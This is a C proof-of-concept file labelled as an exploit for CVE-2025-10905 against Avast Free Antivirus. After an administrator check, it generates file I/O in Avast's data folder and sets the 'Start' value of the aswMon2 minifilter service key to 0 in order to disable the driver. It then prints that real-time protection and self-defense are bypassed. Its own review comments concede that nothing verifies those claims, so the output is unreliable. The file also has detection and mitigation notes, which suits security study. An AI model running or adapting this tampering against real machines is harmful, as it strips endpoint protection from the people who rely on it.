// CVE-2025-10905 PoC - MiniFilter Driver Collision
// Target: Avast Free Antivirus < 25.9 on Windows
// Author: Generated for security research
#include <windows.h>
#include <stdio.h>
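// Registry paths (relative to HKEY_LOCAL_MACHINE) used by this program.
// AVAST_REG_KEY is opened read-only to fetch the service's DisplayName.
// MINIFILTER_REG_KEY is opened for writing to change the driver's "Start" value.
// NOTE(review): the page presents these as Avast's service and minifilter keys;
// that is not verified here. Confirm against an actual installation.
// The pointers are const-qualified so they cannot be re-targeted at run time.
const char *const AVAST_REG_KEY = "SYSTEM\\CurrentControlSet\\Services\\Avast Antivirus";
const char *const MINIFILTER_REG_KEY = "SYSTEM\\CurrentControlSet\\Services\\aswMon2";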
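// Reports whether the Avast service key can be opened and prints its DisplayName.
//
// Despite the name, no version number is read or compared. A TRUE result means
// only that AVAST_REG_KEY exists and is readable; it does not establish that the
// host runs a build older than the fixed release named in the file header.
//
// Returns TRUE when the key opens (even if DisplayName cannot be read, in which
// case an empty name is printed), FALSE otherwise.
BOOL CheckAvastVersion() {
    HKEY hKey;
    char version[256] = {0};
    // Offer one byte less than the buffer: registry strings are not guaranteed
    // to be NUL-terminated, so keep the terminator from the initializer intact.
    DWORD dwSize = sizeof(version) - 1;
    DWORD dwType = 0;

    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, AVAST_REG_KEY, 0, KEY_READ, &hKey) != ERROR_SUCCESS) {
        return FALSE;
    }

    LONG status = RegQueryValueExA(hKey, "DisplayName", NULL, &dwType, (LPBYTE)version, &dwSize);
    RegCloseKey(hKey);

    // On failure (including a value too large for the buffer) or a non-string
    // type, the buffer contents are not meaningful text; print an empty name.
    if (status != ERROR_SUCCESS || (dwType != REG_SZ && dwType != REG_EXPAND_SZ)) {
        version[0] = '\0';
    }

    printf("Avast Product: %s\n", version);
    return TRUE;
}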
// Performs the two actions this PoC labels a "MiniFilter collision":
//   1. creates (or truncates) a file under C:\ProgramData\Avast and writes to
//      it 1000 times, flushing after each write;
//   2. opens MINIFILTER_REG_KEY for writing and sets its "Start" value to 0.
//
// Returns TRUE when the registry key could be opened with KEY_WRITE, FALSE
// otherwise. The result does not depend on the file loop, on whether the
// registry value was actually written, or on any observed change in the
// driver's state.
BOOL TriggerMiniFilterCollision() {
    printf("[*] Attempting to trigger MiniFilter driver collision...\n");
    // File activity phase. CREATE_ALWAYS overwrites an existing temp.dat.
    HANDLE hFile = CreateFileA(
        "C:\\ProgramData\\Avast\\temp.dat",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        CREATE_ALWAYS,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );
    // If the file cannot be created this phase is skipped silently and the
    // function proceeds to the registry write anyway.
    if (hFile != INVALID_HANDLE_VALUE) {
        // NOTE(review): the return values of WriteFile and FlushFileBuffers are
        // ignored, so failed writes go unnoticed. Nothing here detects or
        // measures a race; the loop only generates file I/O.
        for (int i = 0; i < 1000; i++) {
            WriteFile(hFile, "test", 4, NULL, NULL);
            FlushFileBuffers(hFile);
        }
        CloseHandle(hFile);
    }
    // Registry phase: a direct write to the driver's service configuration.
    // Opening an HKLM service key with KEY_WRITE normally needs administrator
    // rights (main checks for them before calling this function).
    HKEY hMiniFilter;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, MINIFILTER_REG_KEY, 0, KEY_WRITE, &hMiniFilter) == ERROR_SUCCESS) {
        DWORD disableFlag = 0;
        // NOTE(review): the RegSetValueExA result is not checked and the service
        // or driver state is never queried afterwards, so the message below is
        // printed whenever the key opens, not when protection is shown to be off.
        RegSetValueExA(hMiniFilter, "Start", 0, REG_DWORD, (const BYTE*)&disableFlag, sizeof(DWORD));
        RegCloseKey(hMiniFilter);
        printf("[+] MiniFilter service disabled\n");
        return TRUE;
    }
    return FALSE;
}
// Defender note: a write to the "Start" value of a security product's service
// key by a process other than the vendor's installer or updater is a tamper
// signal; registry value-set auditing or EDR registry telemetry on that key
// will surface the write above.
// Entry point. Prints a banner, then requires in order:
//   - CheckAvastVersion() to succeed (the Avast service key is readable),
//   - the caller to be an enabled member of BUILTIN\Administrators,
// before calling TriggerMiniFilterCollision().
//
// Exit status is 1 when either precondition fails and 0 otherwise, including
// when TriggerMiniFilterCollision() returns FALSE.
//
// The two "[+]" lines at the end are driven solely by the return value of
// TriggerMiniFilterCollision(); this function does not itself verify the state
// of real-time protection or of the product's self-defense.
int main() {
    printf("CVE-2025-10905 PoC - Avast MiniFilter Driver Collision\n");
    printf("===================================================\n\n");

    if (CheckAvastVersion() == FALSE) {
        printf("[-] Avast not installed or not accessible\n");
        return 1;
    }

    // Build the well-known BUILTIN\Administrators SID and test the current
    // token against it. A NULL token handle makes CheckTokenMembership use the
    // caller's own token.
    SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
    PSID adminGroup = NULL;
    BOOL elevated = FALSE;
    if (AllocateAndInitializeSid(&ntAuthority, 2,
                                 SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
                                 0, 0, 0, 0, 0, 0, &adminGroup)) {
        CheckTokenMembership(NULL, adminGroup, &elevated);
        FreeSid(adminGroup);
    }

    if (elevated == FALSE) {
        printf("[-] Administrator privileges required\n");
        return 1;
    }
    printf("[+] Running with administrator privileges\n");

    if (!TriggerMiniFilterCollision()) {
        printf("[-] Failed to trigger collision\n");
        return 0;
    }

    printf("[+] Real-time protection disabled successfully\n");
    printf("[+] Self-defense mechanism bypassed\n");
    return 0;
}
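// Note: This PoC demonstrates the attack concept.
// Actual exploitation requires specific trigger conditions.
// As written, the program requires administrator privileges, and its success
// messages are printed whenever the driver's service key can be opened for
// writing; it never verifies that the protection state actually changed.
// Detection: alert on writes to the "Start" value of security-product service
// keys made by processes other than the vendor's installer or updater.
// Mitigation: Upgrade to Avast Free Antivirus 25.9 or later.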